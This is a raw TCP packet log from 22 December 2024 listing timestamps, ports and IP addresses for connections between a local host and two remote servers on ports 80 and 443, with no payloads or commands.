Dec 22, 2024 02:16:28.618073940 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.618220091 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.618237019 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.618252993 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.618261099 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.618272066 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.618277073 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.618294954 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.618314981 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.737962008 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.738014936 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.738079071 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.741828918 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.741977930 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.742029905 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.810729027 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.810750961 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.810797930 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.814842939 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.814973116 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.815025091 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.823268890 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.825735092 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.825753927 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.825781107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.825799942 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.833951950 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.834013939 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.834188938 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.834188938 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.842103004 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.842444897 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.842492104 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.850644112 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.850667953 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.850716114 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.859010935 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.859036922 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.859081030 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.867429972 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.867501974 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.867546082 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.874859095 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.875008106 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.875068903 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.882508993 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.882597923 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.882668972 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.890100002 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.890224934 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.890292883 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:28.897711992 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:28.897767067 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.004683018 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.004870892 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.005081892 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.005126953 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.007005930 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.007023096 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.007046938 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.007075071 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.011562109 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.011604071 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.011682987 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.011728048 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.016088009 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.016130924 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.016366005 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.016408920 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.020668030 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.020714045 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.020950079 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.020992041 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.025219917 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.025268078 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.025414944 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.025455952 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.029706955 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.029751062 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.029777050 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.029818058 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.034198046 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.034240961 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.034347057 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.034389019 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.038676023 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.038714886 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.038760900 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.038814068 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.043193102 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.043237925 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.043309927 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.043355942 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.047724009 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.047786951 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.047806978 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.047849894 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.052213907 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.052259922 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.052305937 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.052345991 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.057023048 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.057039976 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.057064056 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.057086945 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.061361074 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.061400890 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.061440945 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.061456919 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.065882921 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.065942049 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.065957069 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.065995932 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.070291996 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.070339918 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.070384026 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.070425034 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.074954033 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.074971914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.074991941 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.075006962 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.079343081 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.079365015 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.079427004 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.084089994 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.084136963 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.084168911 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.084193945 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.088470936 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.088527918 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.088814020 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.088850975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.093127966 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.093144894 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.093182087 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.093197107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.097348928 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.097390890 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.097569942 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.097609997 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.101933002 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.101948977 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.101974010 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.101990938 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.106594086 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.106621027 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.106645107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.106664896 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.117978096 CET	443	49806	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:29.118058920 CET	49806	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:29.119787931 CET	49806	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:29.119844913 CET	443	49806	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:29.120099068 CET	443	49806	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:29.166157961 CET	49806	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:29.166157961 CET	49806	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:29.166301012 CET	443	49806	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:29.197277069 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.197326899 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.197372913 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.197387934 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.199124098 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.199150085 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.199173927 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.199186087 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.202666044 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.202691078 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.202718973 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.202737093 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.206217051 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.206247091 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.206273079 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.206304073 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.209849119 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.209923029 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.210153103 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.210222006 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.213326931 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.213371038 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.213452101 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.213514090 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.217217922 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.217243910 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.217287064 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.218023062 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.220129967 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.220199108 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.220282078 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.220328093 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.223588943 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.223637104 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.223664999 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.223683119 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.226866007 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.226891994 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.226917028 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.226938009 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.230102062 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.230128050 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.230170965 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.230201960 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.233032942 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.233082056 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.233189106 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.233236074 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.236038923 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.236088991 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.236196041 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.236263037 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.239126921 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.239144087 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.239168882 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.239185095 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.242443085 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.242470026 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.242486954 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.242535114 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.245136976 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.245182037 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.245296001 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.245338917 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.248186111 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.248238087 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.248279095 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.248322010 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.251205921 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.251250982 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.251346111 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.251390934 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.254513025 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.254539967 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.254559040 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.254574060 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.257540941 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.257591963 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.257613897 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.257628918 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.260715961 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.260740995 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.260762930 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.260776997 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.263546944 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.263588905 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.263592958 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.263628960 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.266716957 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.266741991 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.266758919 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.266776085 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.269798994 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.269849062 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.269870996 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.269885063 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.272566080 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.272613049 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.272752047 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.272798061 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.275598049 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.275639057 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.275667906 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.275706053 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.389523983 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.389597893 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.389683008 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.389729023 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.390820980 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.390877008 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.390991926 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.391041994 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.393237114 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.393287897 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.393389940 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.393435001 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.396383047 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.396433115 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.396718025 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.396764994 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.398263931 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.398283005 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.398312092 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.398330927 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.400387049 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.400445938 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.400549889 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.400598049 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.402738094 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.402789116 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.402914047 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.402956009 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.405033112 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.405055046 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.405093908 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.405112028 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.407244921 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.407289982 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.407402039 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.407442093 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.409564972 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.409606934 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.409734011 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.409774065 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.411865950 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.411906004 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.412026882 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.412065029 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.414189100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.414222002 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.414225101 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.414261103 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.416404963 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.416421890 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.416466951 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.416488886 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.418483019 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.418545961 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.418689013 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.418729067 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.421042919 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.421067953 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.421092033 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.421106100 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.423286915 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.423332930 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.423357964 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.423402071 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.425509930 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.425558090 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.425676107 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.425714970 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.427639961 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.427660942 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.427686930 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.427706957 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.429776907 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.429822922 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.429871082 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.429913998 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.431778908 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.431833982 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:29.431838989 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:29.431875944 CET	49804	80	192.168.2.4	31.41.244.11
